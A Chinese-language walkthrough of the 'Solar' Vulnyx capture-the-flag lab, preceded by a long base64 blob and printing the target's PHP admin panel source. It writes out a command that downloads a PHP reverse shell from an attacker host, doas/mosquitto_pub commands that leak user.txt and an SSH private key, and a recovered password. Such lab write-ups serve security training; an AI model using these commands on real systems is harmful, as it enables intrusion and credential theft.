UcYKYG39sffI+ZqlIG3+slg15mKpIy2GawwDRy8iFrI+2fsEzDBaS12HFJicmgbOUbwkvM+JaHHtoj/OjNI0fexMu2PbjOu+L+1ZuF/9y4adNGHLe80tyHt+0LdpjvzsD4nVPYhV3vnJo4sfj9pdOn7dolvCuc3rULx48XqxBlaqiiShZJPq6oDXqZiuDzJ0jYLO0N5oHm7LByL62vb6H1tSKHGB3lT6EWGCzkCn19x4NLVWmDZxVvD+bsF/bgujcgFJDTi/JzGikT0WQqF7nWDA/Tk9MpsySVyP0SONPgoh4SkXqEV/CU7WWlpWXbhb4TjPLT++/D8zSrQP8buwaCf2KOBz8sKtiyuaiAcQhzfpDn887Mw/vq6n7RtcAUl2xveByUjwklm4bOKjdTb5+G5on+HsrcQEQa6cfcI/pGQgQlJDbTPo1CHVErwmZmM3iE2fTII2YTNpmFH68vKcNrOj76aE1HadmabeYFD2z424X1EEXNpkfLcFnp+nVlOl3ZuvWlZcxbcPjr3KgvN+g7O8v11RNqF659wdlAItgLaxfWTkittz/8AcnNHzxsr0/Fc1vmaTTzWvwF8zCeVyBVj+oJUq1GjiygBxpBjuOp+H7cgae+JXScFDrgVDE4SnEBarQJg0iJBj4me/MgDH+l2i2eJYnCiQhAl8BlLum1xOI2vEp4cNLEwKuv9i1Y0Nmp2i38ZmtwT1d6+pMVxtNM3VY8R6JBSU5OKvGElpAMh6b3B5dBGQspT3q+WfIk2bbIKsXzwdvJqY25MDiHGFhxb/BsL9jVVshZOyXtRPUXibhDFbxCKnioiUT4CbOXnjO76JkT31SuN+iPOZvG5NcubP54/bqNXR8Lgxu79v8E/w94oJgFh80fLVmG8bIlP4LjJtN+MDU+rrNT+LI6K3Nj15//uHmLlNkgXI8dGxW3SA02rEWDh7VwIErBIT8rsk3D+KN6OLMOHmSyIno0wZ9HN3BsvX//G2Dtx3WqM4oeqZeVnEB/+lXMgEDeip7950HQpLtL3vGvzVMtG/vD/yaN7+EvOK9WxuyD3IFJPS29YE+MS4CwNRYNrRlaE7OPQop8FSrfRg7mBdDjK2i28lO0SlGGDqs3oyrlFORRjUcH4H2YeRdlMTPR68rP0QpVPFrBbEZn6PpX0Cy4P0zWKN9Dx9WT0XFVElqrVsK1HY1TzUXHmcVDO1WDcCX7zw4NwvNu+mwVWgx7O5nFsHYrOh7zGSpSnUEvwPP9qp3IrzxHcR2G+53w3q3MQQvh+rHSAfNJqBNgDaj1yE/eyh6gcebQmZiTsB7oA9iz1S+ifnUOPHuS0mRX3U+vm9WfouOKVJSnbIH7MXRuK9lD1oM8EhA8Q+vQ/0RHcBKeA0eCTbgb9zPxDMcUMnbmGeY481cFp3ArNih6FK8q/rfiC8VF5XilTblSuVX5kfLPcFYpUblVa1WvqP6izlIvV/9E/Zq6L+aWmJKY2pgfxXwY839GJY6qGdU76vioT25KvmnGTeabnrgpyN7BzmWNbAP7K/b8aAXVUiHSkJOjpP3hr9vBQeX5J3C2NMZoND4rjRmkxH+Xxgo0mkmUxpC5mHxprEI3M3XSWI1YZr00HoViwSbE8Wh0p0Km4ZbxT99VK43HoHtm1UvjcWj0rJ9L41iknPUWYMRKyDh4GsVOxhgl4pPSmEGj8JfSWAHzgjRWokQmRRqr0K1MsTRWo3jGJY1HoRTmYWk8GuUzb0rjW9LyFf8kjcegxvwL0ngcSpz1uDSORaNmvQyS9SAvakc+5EQNqBEFEIfuQjbIXBzKhsg0DeXAqB5WcKgA1gSQH94+xCMrcqEMmNUhN6zPhJEGNcMPh0whWH56x8OVhz2t8GmHlexVYJ0RwmoBTK2AaznsccNqQocV9nw9jEUwWg77qlALrLDBWiuFxtMdVsoRB1Dc8OmFNfUA1wnrONjvAexW+gzq10KPt93nbGgMcHfZJnPZ06blcPXtXIEz4A/4eKsrg9O5bZmcprmZM5FVfs7E+3lfK2/PZC/ZOoNstVhbXcs97gauwNp4mY1F/HJrVQtna7S6G3g/Z/XxnNPNeVvqm502zu5xWZ1uoCyaRTNl0A/T4maz1Q03BcCMBzXBwONpurotV7OmikrbDzLyUAlmg8xzSOat4n1+p8fNZWfm5EWDGgZoJFwOCk3UaUCyOBmvw+MGEQVA4ojqPQBay0dZ8GOXYLQCjEzY64GrDzTJU3g+qvNMgMvDHtQYCHjzs7LsALS1JdPvafHZeIfH18Bnunl4XBxBgWwjsp1e6g3kGbE7ntouDxbkQW2wlljqjbE/AqkEnrTDmka60wnPvJSvALV1IjUf3UG8g0BtHSbJ4XyE/aslyr8uxw0LPyPxLtqAFUaRUrvU01k09Tp+2KuKHjc+Zo2s7zDPTnjC0lGAzhArdFFZN8GcBzTwj2ghnFVQeC4KLexNTkpTI33GS3w1UCxuSesZkt5FbYnYRBsT7T2D0uWh2nfT/V7JY0UMHoAakGzMKVmBlcIQJc1KMAOUiuH2ZKPriB2K0GUIZLVIu2jLPHV40fZSIqwkhWqO7LXTq5/SZYM9Vok/lnqBDSzURaEE6BNZPg4YNUuedFeIxjAGErUI/QGwX9H6CcawTMiMl3qNHTDY6G6ZGjvlIEBtrR6eBuhTEQd7BQwZkjfbgLIWCkWUSRu1gUYalQKSZFx0LpIjmQdflFWK1LZQGWZEaIeMXVSfoq7ZiAjih90Zl+EjI8RnFo0gHIUs+oMI2ylJNVr7V+ZalpxIrTdk0QFKV9jqwhy1UXm4rgqD7A0OGtXdEod8BEY7/SQ4MuiVSGI5rLBReOIaWX/EjpulyCZryEZx2ynFTonSfOqdFok6K0D00MgQ1kFkLApL4NJI4Ib1Ackb/FFrZV8JSywyBkTu4yjPVko5S2NztK2J0hBzifUK+vTQLMhJunfRazh+XI0uAjQTkcxqlTjKjJLUlfYSmbRLuUXETmTuoDTaJUtqpnbqC82IlBKZ2iN0Hml1cga10ozopDGjmd6xIY7slFKiL3eENBqi8qqISY6hVmo9ou3KOIbLx/8PeZKpZCUOwhZmpTq6egqi8QyXx0i0ZUj6bqb7nJeJ5mxIOz4aZ600roThyjP+kEXK/jI8e/BSnOMpFzKmNsqVne5PGSEfpoT4Hr6DhWdytk2JsDLRZ/TD8ks99XdPBK0tkh/IdtIKT50jSIxHK6mc3ZIne+FHzF5WGlH50I5IvYs0yzPsiJ7SSCM8R69+iUaeWtLl7ESOdSPFbjvNBG6q90h5jSRVNkJykTq8Vl/106gp5+qwt8meRCqH5lDt4ZN2REP0Uotugs8GSWNiPiRWxYai6jcZqS7PVb3kIwEpHzpCkipFWorHiAxwR/AY4c6CqqGONNFnOpjjoI4zwZMquCuC2SKqFw19Qp6nUG+shjGBaESVFJYIwwSfBHYNzBDYHL0nd/NhvQFgkb1atJDi0AI0M1BmhDGBXQ6zerhqpXVkRyHMVMI9GZcgUoWK+Aywy0J9h+wjtIiUWmA+jDWaKh3FKFNWDncmgF8qPdUAbB2FR+jPoPURGRskOkXJmSh0IiMCmcAsBIr09I7MVsK1AtaZqTw1lGeRWgPloRiei7xoKQWiJkSKCuFaAbjJihKgy0KlQDBZpJUZVI+EnyK6n2CdT1eJlBklLZNxGEqmJEuRDiL/qhBmM+VfDz8c5d8CMxaqGw3Al+HKtlNCIRC6WSqNSsqfhsrBSDEU0HVEikSe+pDFmSK0UkjlRfRGKC+imDRUIuYROZGhRWpnJOtgQxhKKH9aKik9XW0GOWphvS40I9qjjvJaKMlahCnavWgT+gjpFlIeiWYXAFatZFMaKrtoLoieqin9YS5EDWikz8IImYW1b5C0K9NjoZgtI0ilmvqilq7SUF2bQz5STP23XKK8MmRh4RhQKdmnMURZtHxlP5LXXU3sEGHJuKM1WETtSS9RaA5JQ1zBXgGuGLu0kNds9JwTCMXt6MwdWTWGq9HIujMjItZGVgJiFC6ha13D1oVnxdOSmLPCZ53I2m2kE7Z8OhZrebnqDVcfYuwWz0SRVa+d1udiDegPVSUeWgd6QpVJG30azuleqXfiiTrnEcxWmvszQrjkXBSGJdaVVlotEGz+EaR5+QzFXnIy9NJ8L2Jpo+OAVJkQ/lqktWT+3mGnYbn/c6kOuBF1IPMyUuUQKX8f1bdXOks5qYRJPZkpwfUh+VwWlgmRgNh3cw3Tetj6CLR8NLyrQGTQEEG5ncqaRWIPj+BkabySe1zffdfpRvesv0/9IDaqHzS88vrm+kHsiP0g7lvuB7FX1Q+KruRtETSFex3yyqvroI7UYWG/s74Sd0lfif3/faWIvlK4w/D/Zl+Jjcqw311fiR3htPZ96CuxI/aVwhx9O30l9gr9gm+nr8Sir9tXCv/V6Ub2lcL+Ft1Xulz2vXx3STyfi5XE9627xKLo7tLI3Y1vp7vEXkG6XIQEv99dJpba2KXVzLffZWK/x10mdliXKXzW/Ta7TOw/7DJx31qXif0aXSbuG+sysVQGVQC1jFIrSlsDz7+93hE7os6/q94Re0nviPvOekfsZXtH4R7QN987Yr9G7+hKcL/Z3pEcWS+fUS7t+LDX0PGJ7NLcyI4Pe10dn0vPbNfW8WEjOj5X6jvciA5N4BL481C408BSPOQuE6Fi+gUt8lU18mW30PfjuLv8PM/V882etsmZ3FV8sS2TK2lu9zb6OafL6/EFeDvn8HlcnMbHt0pfApNx0C/StYhfpItEw7Jh7FW8z8qJpIW+jcdOveKLvfR7e1f9lT9uGGann7VyAZ/VzrusvibO4xgOhWUreJ/L6adfmnP6uUbexwOuBp/VDaxnAO/AFmwDifka+Awu4OGs7nbOy/v8sMFTHwCJOUEEVs4GRLOwMtDIy3Ky2TwuLywnCwKNAB2kzLv9IL0UKpKUyQDMzln9fo/NaQV8rN1ja3Hx7oA1QOhxOJtBSXcRiHQDZ/Y4Am0g/pTJlBIf7/V57C02noKxO4ExZ31LgCc0sFEbMkDNtuYWO6GkzRlo9LQEgBiXU0JEMPhEUQLYFj+sJ+xkcC6ecM1SA/E3ZkTgyCA4szw+zs+DHmC1E0iV2B+GmhAHYL1E0AFWFB1F1NYIhnXJBqIGR4vPDQh5utHu4fyeDM7fUr+ctwXIDOHP4WkGYyMM2Txuu5Pw4c9nWQuAs9Z7WnnKgWhFlICQEbg9AVCDX5wlWvGGLUB8xvkbrc3NbD0vSQ3IAC+xRvHpcYNd+DiXx8ePyDYXaPfyDisgyhSJin7qsraDt8B2u9PhJIZmbQ6A6cEAgFrtdsq5KDrioFYf0NXSbPWxBJGd9zsb3JSMBtFXYROxUKsNgPjJDpke/3BMBCQLCKjArM0jA5D2yHSEoQF57uZ2zhlh5ixhx8eT/5aGriUDPxEk0YvsHjzYHO+jm9o8PrufSwn5YQrBLT9gU4jbplCRgWb0kr/U8+BJBGoL6IDIpNXjDBHGrwyAx3BWrxfcy1rfzJMHIu8AmQzYsFIarQGu0eoHiLw7SibE6sLWbeda3HaJ4DCpLCVO5PBKWvV7molXU7URJVm5ZhI9wFfkhV6rrcnaAIyBH7o9LDHVr2dUUaggYAGJfLODEFWq5YqNBgtnNhZbqjUmLaczcxUmY5WuSFvEpWjMcJ+SwVXrLKXGSgsHK0wag6WGMxZzGkMNN19nKMrgtAsrTFqzmTWaOF15hV6nhTmdoVBfWaQzlHAFsM9gtHB6XbnOAkAtRrpVAqXTmgmwcq2psBRuNQU6vc5Sk8EW6ywGgAnEmTgNV6ExWXSFlXqNiauoNFUYzVqAUQRgDTpDsQmwaMu1wAQAKjRW1Jh0JaWWDNhkgckM1mLSFGnLNab5GRwAMwLLJo4uyQQqAQanrSKbzaUavZ4r0FnMFpNWU07WEumUGIzlWrbYWGko0lh0RgNXoAVWNAV6rUgbsFKo1+jKM7giTbmmhLAjIyHLRHbC4mDJhhKtQWvS6DM4c4W2UEcGIEedSVtooStB9iAJPSW30GgwaxdUwgSsk1FksNWlWooCGNDAbyGljLJvAHYJHIvRZAmRUq0zazM4jUlnJhopNhmBXKJPYzG1gEqQJ1GeQaKX6IjMXWodsIrslhgs0mr0ANBMyIAJNmotWJd2pY33BohtS84thkYaRsXYmUGtVgwCYMIlbnBccY4OIS2BZ9GsI0a3cMIm6ThDDL00fIB1QyYSQ6+9lYcI6CehxONjPSSYtDn91NMhBbo8Ys7j/NZmQAa7iBfRVRArrc2wzR8iM8qhWDkZen1O2NLmcwYgmHDWFpj1Oe+V0rBPSlOUAy7MAcESDg4i/T7e74Us5Wzlm9szYa2P5DJKidPt8PhcEutUfLZAvlwqBLgGCtzuCbAeX0Mmx7K04rru0ulq/8nDjamDWLEO4q6lDmLDdRB3jXUQe2kdJAV5G4Xkl3PGCAVquGBhr6dW4uRaif1+1EqsqIdvrFZiRYe9rlqJvYG1EhuulbhrrJXYqLrgGmol9nK1Enf1tRIbUStFum9UuQT5HILEjSqXWKlc4q6rXGKjyKXnxhtdMrFuD3fdJRN7Q0smViqZuGsvmdjhJRN3LSUTO2LJxH2dkom1aKrKy4yEbE3pNVVHbJjz66mOWLk64q6nOmIjqyPumqojdsTqiLue6ogYa5SjhAof9rKFD/c1Ch/2yoUPdxWFD0sLn+ja4R8XNAF5/TxaNLCZcMm8nn8zmEX7dk3wzqK9Mzv9q14m/fuqF+ai/1p45X9hmNXmbHJmOSFYrcz0NnqzpIh5Lf+W8/8CB3iblgplbmRzdHJlYW0KZW5kb2JqCjIxIDAgb2JqCjg4MDMKZW5kb2JqCjE5IDAgb2JqCjw8IC9UeXBlIC9Gb250Ci9TdWJ0eXBlIC9DSURGb250VHlwZTIKL0Jhc2VGb250IC9EZWphVnVTYW5zCi9DSURTeXN0ZW1JbmZvIDw8IC9SZWdpc3RyeSAoQWRvYmUpIC9PcmRlcmluZyAoSWRlbnRpdHkpIC9TdXBwbGVtZW50IDAgPj4KL0ZvbnREZXNjcmlwdG9yIDE3IDAgUgovQ0lEVG9HSURNYXAgL0lkZW50aXR5Ci9XIFswIFs1OTUgMzM0IDU4NyA2MDggNDA4IDgxMSA1MTcgNjI5IDYyOSAzNDkgMjc2IDYxMCA2MzAgMzE1IDU4NyA1ODcgNjMwIDYyOSA1OTggNzY0IDYzMSA3NDYgNjc5IDY1MSAyOTMgNzQyIDI3NiA2MDYgNjMxIDY3OSA2ODAgNjMwIDI5MyA2ODkgOTgxIDcyNiA2MzEgNjkzIDYwNyA2MzAgNjMxIDYzMSA1MjEgNjMxIDU0NSA2MzEgNjA2IDc4MSA3ODEgNTc0IDI3NiA5NjYgNjMwIDY4MCA4MzEgNzY5IDU3MSA2MzEgNjgxIDYzMSA4NTYgMzg5IDU1MyA2MjcgNjMxIDYzMCA4MzEgXQpdCj4+CmVuZG9iagoyMCAwIG9iago8PCAvTGVuZ3RoIDgyNiA+PgpzdHJlYW0KL0NJREluaXQgL1Byb2NTZXQgZmluZHJlc291cmNlIGJlZ2luCjEyIGRpY3QgYmVnaW4KYmVnaW5jbWFwCi9DSURTeXN0ZW1JbmZvIDw8IC9SZWdpc3RyeSAoQWRvYmUpIC9PcmRlcmluZyAoVUNTKSAvU3VwcGxlbWVudCAwID4+IGRlZgovQ01hcE5hbWUgL0Fkb2JlLUlkZW50aXR5LVVDUyBkZWYKL0NNYXBUeXBlIDIgZGVmCjEgYmVnaW5jb2Rlc3BhY2VyYW5nZQo8MDAwMD4gPEZGRkY+CmVuZGNvZGVzcGFjZXJhbmdlCjIgYmVnaW5iZnJhbmdlCjwwMDAwPiA8MDAwMD4gPDAwMDA+CjwwMDAxPiA8MDA0Mj4gWzwwMDJGPiA8MDA3Nj4gPDAwNjE+IDwwMDcyPiA8MDA3Nz4gPDAwNzM+IDwwMDc1PiA8MDA2RT4gPDAwNjY+IDwwMDY5PiA8MDA2NT4gPDAwNjQ+IDwwMDJFPiA8MDA3OT4gPDAwNzg+IDwwMDcwPiA8MDA2OD4gPDAwNTA+IDwwMDQ0PiA8MDAzOT4gPDAwNDg+IDwwMDQxPiA8MDA0Qj4gPDAwNEE+IDwwMDRFPiA8MDA2Qz4gPDAwNTk+IDwwMDMzPiA8MDA1Nj4gPDAwNUE+IDwwMDUzPiA8MDA0OT4gPDAwNTI+IDwwMDU3PiA8MDA1NT4gPDAwMzc+IDwwMDQzPiA8MDA2Rj4gPDAwNjI+IDwwMDMyPiA8MDAzNT4gPDAwN0E+IDwwMDMxPiA8MDA2Mz4gPDAwMzA+IDwwMDU0PiA8MDA1MT4gPDAwNEY+IDwwMDZCPiA8MDA2QT4gPDAwNkQ+IDwwMDY3PiA8MDA1OD4gPDAwMkI+IDwwMDQ3PiA8MDA0Nj4gPDAwMzQ+IDwwMDQyPiA8MDAzOD4gPDAwNEQ+IDwwMDc0PiA8MDA0Qz4gPDAwNDU+IDwwMDM2PiA8MDA3MT4gPDAwM0Q+IF0KZW5kYmZyYW5nZQplbmRjbWFwCkNNYXBOYW1lIGN1cnJlbnRkaWN0IC9DTWFwIGRlZmluZXJlc291cmNlIHBvcAplbmQKZW5kCgplbmRzdHJlYW0KZW5kb2JqCjYgMCBvYmoKPDwgL1R5cGUgL0ZvbnQKL1N1YnR5cGUgL1R5cGUwCi9CYXNlRm9udCAvRGVqYVZ1U2FucwovRW5jb2RpbmcgL0lkZW50aXR5LUgKL0Rlc2NlbmRhbnRGb250cyBbMTkgMCBSXQovVG9Vbmljb2RlIDIwIDAgUj4+CmVuZG9iagoyIDAgb2JqCjw8Ci9UeXBlIC9QYWdlcwovS2lkcyAKWwo1IDAgUgoxMSAwIFIKXQovQ291bnQgMgovUHJvY1NldCBbL1BERiAvVGV4dCAvSW1hZ2VCIC9JbWFnZUNdCj4+CmVuZG9iagp4cmVmCjAgMjIKMDAwMDAwMDAwMCA2NTUzNSBmIAowMDAwMDAwMDA5IDAwMDAwIG4gCjAwMDAwMjE2NTMgMDAwMDAgbiAKMDAwMDAwMDIwMSAwMDAwMCBuIAowMDAwMDAwMjk2IDAwMDAwIG4gCjAwMDAwMDAzMzMgMDAwMDAgbiAKMDAwMDAyMTUxNyAwMDAwMCBuIAowMDAwMDAwNjM3IDAwMDAwIG4gCjAwMDAwMDcwNTQgMDAwMDAgbiAKMDAwMDAwMDQ1MiAwMDAwMCBuIAowMDAwMDAwNjE3IDAwMDAwIG4gCjAwMDAwMDcxMjQgMDAwMDAgbiAKMDAwMDAwNzA3NCAwMDAwMCBuIAowMDAwMDA3NDMyIDAwMDAwIG4gCjAwMDAwMTA5NjQgMDAwMDAgbiAKMDAwMDAwNzI0NiAwMDAwMCBuIAowMDAwMDA3NDEyIDAwMDAwIG4gCjAwMDAwMTA5ODUgMDAwMDAgbiAKMDAwMDAxMTI0NSAwMDAwMCBuIAowMDAwMDIwMTYxIDAwMDAwIG4gCjAwMDAwMjA2MzkgMDAwMDAgbiAKMDAwMDAyMDE0MCAwMDAwMCBuIAp0cmFpbGVyCjw8Ci9TaXplIDIyCi9JbmZvIDEgMCBSCi9Sb290IDEyIDAgUgo+PgpzdGFydHhyZWYKMjE3NTgKJSVFT0YK HTTP/1.1" 200 -

<?php
$secure = true;
$httponly = true;
$samesite = 'Strict';
$secret = [
    'user' => '5up3r',
    'pass' => 'bloods'
];

if (PHP_VERSION_ID < 70300) {
    session_set_cookie_params($maxlifetime, '/; samesite=' . $samesite, $_SERVER['HTTP_HOST'], $secure, $httponly);
} else {
    session_set_cookie_params([
        'lifetime' => $maxlifetime,
        'path' => '/',
        'domain' => $_SERVER['HTTP_HOST'],
        'secure' => $secure,
        'httponly' => $httponly,
        'samesite' => $samesite
    ]);
}
session_start();

if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_POST['username']) && isset($_POST['password'])) {
    $username = $_POST['username'];
    $password = $_POST['password'];

    // Verify credentials 
    if ($username === $secret['user'] && $password === $secret['pass']) {
        $_SESSION['loggedin'] = true;
        header('Location: server.php');
        exit;
    } else {
        $error = "Incorrect username or password.";
    }
}

if (isset($_SESSION['loggedin']) && $_SESSION['loggedin'] === true) {
    // Handle logout
    if (isset($_POST['logout'])) {
        session_destroy();
        header('Location: server.php');
        exit;
    }

    // Handle command execution
    if (isset($_POST['execute']) && isset($_POST['command_file'])) {
        $commandFile = 'commands/' . basename($_POST['command_file']);
        if (file_exists($commandFile)) {
            $commandJson = file_get_contents($commandFile);
            $command = json_decode($commandJson, true);

            if (isset($command['cmd'])) {
                $output = shell_exec(escapeshellcmd($command['cmd']));
                $mqttHost = 'localhost';
                $mqttTopic = 'server/command/output';
                $mqttMessage = json_encode([
                    'name' => $command['name'],
                    'command' => $command['cmd'],
                    'output' => base64_encode($output)
                ]);
                $mqttCommand = sprintf(
                    'mosquitto_pub -h %s -t %s -m %s -u '.$secret['user'].' -P \''.$secret['pass'].'\'',
                    escapeshellarg($mqttHost),
                    escapeshellarg($mqttTopic),
                    escapeshellarg($mqttMessage)
                );
                shell_exec($mqttCommand);
            } else {
                $output = "Invalid command format in the file.";
            }
        } else {
            $output = "Command file not found.";
        }
    }

    // Get list of command files
    $commandFiles = array_diff(scandir('commands'), ['.', '..', 'php-info.php']);

    // Show admin panel if user is authenticated
    ?>
    <!DOCTYPE html>
    <html lang="en">

    <head>
        <meta charset="UTF-8">
        <title>Admin Panel</title>
        <link rel="stylesheet" href="/style.css">
        <link rel="stylesheet" href="/styleadmin2.css">
    </head>

    <body>
        <main>
            <h1>Server Administration Panel</h1>
            <p>This is a server administration or management page.</p>
            <p style="text-align:left;">Server contains two websites:
            <ul>
                <li style="text-align:left;"><strong>sunfriends.nyx</strong> a forum about solar energy.</li>
                <li style="text-align:left;"><strong>solar.nyx</strong> a real time control panel for the community solar
                    installation.</li>
            </ul>
            </p>
            <form method="post" action="">
                <input type="submit" name="logout" value="Logout">
            </form>
            <h2>Server Information</h2>
            <form method="post" action="">
                <label for="command_file">Select Command:</label>
                <select name="command_file" id="command_file" required>
                    <?php foreach ($commandFiles as $file): ?>
                        <option value="<?php echo htmlspecialchars($file); ?>"><?php echo htmlspecialchars($file); ?></option>
                    <?php endforeach; ?>
                </select>
                <br><br>
                <input type="submit" name="execute" value="Execute">
            </form>
            <?php if (isset($output)): ?>
                <h3>Command Output:</h3>
                <pre><?php echo htmlspecialchars($output); ?></pre>
            <?php endif; ?>
        </main>
    </body>

    </html>
    <?php
} else {
    // Show login form if user is not authenticated
    ?>
    <!DOCTYPE html>
    <html lang="en">

    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>Admin Login - Solar Community Server</title>
        <link rel="stylesheet" href="/style.css">
        <link rel="stylesheet" href="/styleadmin.css">

    </head>

    <body>
        <!-- Main container for the login form -->
        <div class="login-container">
            <!-- Page header -->
            <h2>Admin Login</h2>

            <!-- Subheader to clarify the purpose of the login -->
            <h3>Administration Server for <strong>solar.nyx</strong> and <strong>sunfriends.nyx</strong></h3>

            <!-- Display error message if present -->
            <?php if (isset($error)): ?>
                <p class="error"><?php echo $error; ?></p>
            <?php endif; ?>

            <!-- Login form -->
            <form method="post" action="">
                <!-- Username input -->
                <label for="username">Username</label>
                <input type="text" name="username" id="username" required>

                <!-- Password input -->
                <label for="password">Password</label>
                <input type="password" name="password" id="password" required>

                <!-- Submit button -->
                <input type="submit" value="Login">
            </form>

            <!-- Footer link to the main site -->
            <div class="footer-link">
                <p>Not an admin? <a href="/">Return to Solar Community Forum</a></p>
            </div>
        </div>
    </body>

    </html>
    <?php
}
?>

OK，可以看到账号和密码了，尝试登录server.php,成功登录，分析页面源码发现这个页面也连接MQTT，尝试登录，连接成功

图片.png

先将之前的data，record加上，再直接订阅全部内容#可以接收数据，发现页面执行操作时会发送到server/command/output主题，这里卡进度了，看作者教程说尝试各种主题，它这也是试出来的，试到new时发送消息error主题会有反馈，观察发现几个状态很熟悉又回到刚开始时扫目录扫到的commands点进去查看格式，发现格式都为name+cmd

图片.png

开始编辑命令先试whoami发现没回显，查看源码发现是用escapeshellcmd函数来转义字符串中的特殊符号了

图片.png

尝试构建一个新的命令，开始反弹shell,这里用模版建了个shell脚本

{
  "name": "upload-revshell",
  "cmd": "curl -o /var/www/solar.nyx/records/shell.php http://192.168.81.60:8000/php-reverse-shell.php"
}

图片.png

返回server界面发现之前上传的json都在这，监听执行curl一下

1	curl https://www.solar.nyx/records/shell.php -k

图片.png

离成功不远了感觉，查看一下TTY 设置

1	www-data@solar:/$ cat /etc/doas.conf

图片.png

1	www-data@solar:/$ cat /etc/doas.conf

图片.png

发现www-data 用户 无需密码 即可以 lenam 身份执行 /usr/bin/mosquitto_pub
学一下/usr/bin/mosquitto_pub

-h : 指定MQTT代理的主机名或IP地址。默认为localhost。

-unix : 通过Unix域套接字而不是TCP套接字连接到代理，例如：/tmp/mosquitto.sock。

p : 指定MQTT代理的端口号。默认为1883（普通MQTT）和8883（MQTT over TLS）。

u : 提供用户名。

P : 提供密码。

t : 指定发布消息的主题。

L : 以URL形式指定用户、密码、主机名、端口和主题，例如：mqtt(s)://[username[:password]@]host[:port]/topic。

f : 将文件内容作为消息发送。

l : 从标准输入读取消息，每行发送一个单独的消息。

n : 发送一个空（长度为零）的消息。

m : 要发送的消息内容。

给终端升级一下，原始终端属实不好用，运行一下将数据发到fi主题，再把同目录下的note.txt也发了

Kal ddddx ~ ❯ stty raw -echo;fg 
doas -u lenam /usr/bin/mosquitto_pub -L mqtt://5up3r:bloods@localhost:1883/fi -f /home/lenam/user.txt
doas -u lenam /usr/bin/mosquitto_pub -L mqtt://5up3r:bloods@localhost:1883/fi -f /home/lenam/.ssh/id_ed25519

图片.png

`.ssh` 目录的主要文件

文件名	作用
`id_rsa`	私钥（默认的 RSA 私钥）
`id_rsa.pub`	公钥（与 `id_rsa` 配对）
`id_ed25519`	私钥（Ed25519 算法，更新版）
`id_ed25519.pub`	公钥（与 `id_ed25519` 配对）
`known_hosts`	已知主机列表，存储 SSH 连接过的服务器公钥，防止 MITM 攻击
`config`	SSH 客户端配置文件，用于定义别名、端口、身份验证方式等
`authorized_keys`	允许 SSH 登录的公钥，存放已授权的公钥，服务器使用
`ssh_config`	系统级 SSH 客户端配置（通常位于 `/etc/ssh/ssh_config`）
`sshd_config`	SSH 服务器配置（位于 `/etc/ssh/sshd_config`，仅服务器使用）

拿到user和密钥,试着爆破，爆不出来，密钥强度很高，顺便查看一下authorized_keys

1	doas -u lenam /usr/bin/mosquitto_pub -L mqtt://5up3r:bloods@localhost:1883/fi -f /home/lenam/.ssh/authorized_keys

ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIE8G8M95Y8BUlMqbTsv9CKcq8mefKwEnXrGTswVfh0xo lenam@solar

c25e7b68dd71d1ca9d8f86da2df12035

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABACAiuY2y
KncKfFktSk6euqAAAAEAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIE8G8M95Y8BUlMqb
Tsv9CKcq8mefKwEnXrGTswVfh0xoAAAAkIJIgfgFcAYwUAewcKCiH1cqgQJbCzjAwXYAxB
u9G7Pr0WVwHcGPoksvuYrPodhd7dzkh1qYbNJvVkxgY1b99U8iANbgDjln+V48BWPY5/OG
R2ozwP2jgHFCyBdwqMr2zVnZbHA05br5wQoKWSEzmSC1N16q/BGuOIUr3lDKPq4fJLdb7o
I2a07w0+3R/Wlbcw==
-----END OPENSSH PRIVATE KEY-----

note.txt则得到
You just have to remember the one that starts with love and ends with a number.
你只需要记住以爱开始、以数字结束的那个。

下了个工具

1 2	wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh chmod +x linpeas.sh

linpeas.sh 是 Linux Privilege Escalation Awesome Script（PEAS 系列的一部分），用于本地权限提升（Privilege Escalation）信息收集。它是渗透测试和 CTF 竞赛中常用的工具，可以帮助发现系统中的安全漏洞，例如：

错误的 SUID/GUID 文件
错误的权限（可写的 passwd、shadow 等）
敏感的环境变量
存在漏洞的内核版本
可利用的计划任务（cron jobs）
暴露的 SSH 密钥、配置文件

去目标机上传一下

1 2	www-data@solar:/$ cd /tmp www-data@solar:/tmp$ curl 192.168.81.60:8000/linpeas.sh > linpeas.sh

图片.png

目标明确开始提权

看作者提示，文件列表中有nanorc发送一下nanorc，有一个设置history

图片.png

刚开始还不知道在哪，查了一下在.local/share/nano ，记录在serach_history下,得到

密码：CzMO48xpwof8nvQ6JUhF

1	doas -u lenam /usr/bin/mosquitto_pub -L mqtt://5up3r:bloods@localhost:1883/fi -f /home/lenam/.local/share/nano/search_history

图片.png

开始ssh登录，先将之前获得的密钥放入id中，成功登录

1	ssh lenam@192.168.81.83 -i id

图片.png

如果您喜欢此博客或发现它对您有用，则欢迎对此发表评论。也欢迎您共享此博客，以便更多人可以参与。如果博客中使用的图像侵犯了您的版权，请与作者联系以将其删除。谢谢！

Solar - Vulnyx

Solar - Vulnyx

`.ssh` 目录的主要文件

特色标签

链友

Solar - Vulnyx

.ssh 目录的主要文件

特色标签

链友

`.ssh` 目录的主要文件